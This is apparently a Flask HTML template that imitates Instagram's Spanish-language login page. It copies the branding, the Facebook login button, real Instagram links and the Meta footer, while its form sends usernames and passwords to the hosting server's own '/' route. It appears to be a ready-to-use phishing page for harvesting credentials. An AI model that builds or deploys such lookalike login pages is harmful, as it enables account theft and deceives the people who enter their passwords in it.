<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <style>

        body {
    background-color: #fafafa;
    font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Helvetica, Arial, sans-serif;
    display: flex;
    justify-content: center;
    align-items: center;
    min-height: 100vh;
    margin: 0;}
.login-page {
    max-width: 350px;
    width: 100%;
    margin: 0 auto;}
.form-container {
    background-color: #fff;
    border: 1px solid #dbdbdb;
    padding: 20px;
    text-align: center;
    border-radius: 3px;
    margin-bottom: 10px;}
.logo img {
    width: 175px;
    margin-bottom: 20px;}
input[type="text"], input[type="password"] {
    width: 100%;
    padding: 9px 0 7px 8px;
    margin: 6px 0;
    border: 1px solid #dbdbdb;
    border-radius: 3px;
    font-size: 14px;
    background-color: #fafafa;
    box-sizing: border-box;}
.login-button {
    background-color: #0095f6;
    color: #fff;
    border: none;
    padding: 7px;
    width: 100%;
    border-radius: 4px;
    font-size: 14px;
    font-weight: 600;
    cursor: pointer;
    margin-top: 10px;}
.login-button:hover {
    background-color: #0074cc;}
.separator {
    margin: 10px 0;
    color: #8e8e8e;
    font-size: 13px;
    font-weight: 600;
    text-transform: uppercase;}
.fb-button {
  display: inline-flex;
  align-items: center;
  background-color: transparent;
  color: #0095f6;
  padding: 10px 15px;
  text-decoration: none;
  border: none;
  font-size: 14px;
  font-weight: 600;
  font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Helvetica, Arial, sans-serif;
  gap: 8px;
  cursor: pointer;
}

.fb-button:hover {
  text-decoration: underline;
}

.fb-logo {
  width: 16px;
  height: 16px;
}


.forgot-password {
    display: block;
    margin-top: 15px;
    color: #00376b;
    font-size: 12px;
    text-decoration: none;}
.signup-container {
    background-color: #fff;
    border: 1px solid #dbdbdb;
    padding: 20px;
    text-align: center;
    border-radius: 3px;
    margin-bottom: 20px;}
.signup-container p {
    margin: 0;
    font-size: 14px;}
.signup-container a {
    color: #0095f6;
    font-weight: 600;
    text-decoration: none;}
.app-download {
    text-align: center;}
.app-download p {
    font-size: 14px;
    color: #262626;}
.app-links img {
    height: 40px;
    margin: 10px 5px;}
    </style>
    <link rel="icon" type="image/png" href="https://static.cdninstagram.com/rsrc.php/yI/xY/hq/ig_logo.png">
</head>
<body>
    <div class="login-page">
        <div class="form-container">
            <div class="logo">
                <img src="{{ url_for('static', filename='IG.png') }}" alt="Logo Instagram">
            </div>
            <form method="POST" action="/" id="login-form">
                <input type="text" name="username" placeholder="Teléfono, usuario, o Correo electronico" required>
                <input type="password" name="password" placeholder="Contraseña" required>
                <button type="submit" class="login-button">Entrar</button>
            </form>
            <div class="separator">O</div>
            <div class="facebook-login">
            <a href="#" class="fb-button">
  <img src="https://upload.wikimedia.org/wikipedia/commons/0/05/Facebook_Logo_%282019%29.png" alt="Facebook" class="fb-logo">
  Iniciar sesión con Facebook
</a>



            </div>
            <a href="https://www.instagram.com/accounts/password/reset/" class="forgot-password">¿Has olvidado la contraseña?</a>
        </div>
        <div class="signup-container">
            <p>¿No tienes una cuenta? <a href="https://www.instagram.com/accounts/emailsignup/">Registrate</a></p>
        </div>
        <div class="app-download">
            <p>Descarga la aplicación.</p>
            <div class="app-links">
                 <a href="https://itunes.apple.com/app/instagram/id389801252">
          <img src="{{ url_for('static', filename='microsoft.png') }}" alt="App Store">
        </a>
        <a href="https://play.google.com/store/apps/details?id=com.instagram.android">
          <img src="{{ url_for('static', filename='googleplay.png') }}" alt="Google Play">
        </a>
            </div>
        </div>
    </div>
    <script>

        document.addEventListener('DOMContentLoaded', () => {
    const form = document.getElementById('login-form');
    const username = form.querySelector('input[name="username"]');
    const password = form.querySelector('input[name="password"]');
    const loginButton = form.querySelector('.login-button');

    function checkInputs() {
        loginButton.disabled =!(username.value.trim() && password.value.trim());
        loginButton.style.opacity = username.value.trim() && password.value.trim() ? '1' : '0.4';}
    username.addEventListener('input', checkInputs);
    password.addEventListener('input', checkInputs);
});

    </script>
</body>

<div class="texto-superior">
  Meta   Información   Blog   Empleo   Ayuda   API  Privacidad   Configuración de cookies   Condiciones   Ubicaciones   Instagram Lite   Threads    Meta Verified 
</div>


<div class="footer-fijo">

Español (España)
© 2025 Instagram from Meta
</div>

<style>
  .footer-fijo {
    position: fixed;
    bottom: 0;
    width: 100%;
    background-color: #fafafa;
    text-align: center;
    padding: 30px;
    font-size: 14px;
    color: #666;
  }

   .texto-superior {
    position: fixed;
    bottom: 80px; /* Ajusta la distancia desde la parte inferior */
    width: 100%;
    text-align: center;
    font-size: 14px;
    color: #333;
    word-spacing: 14px;
  }

</style>

</html>
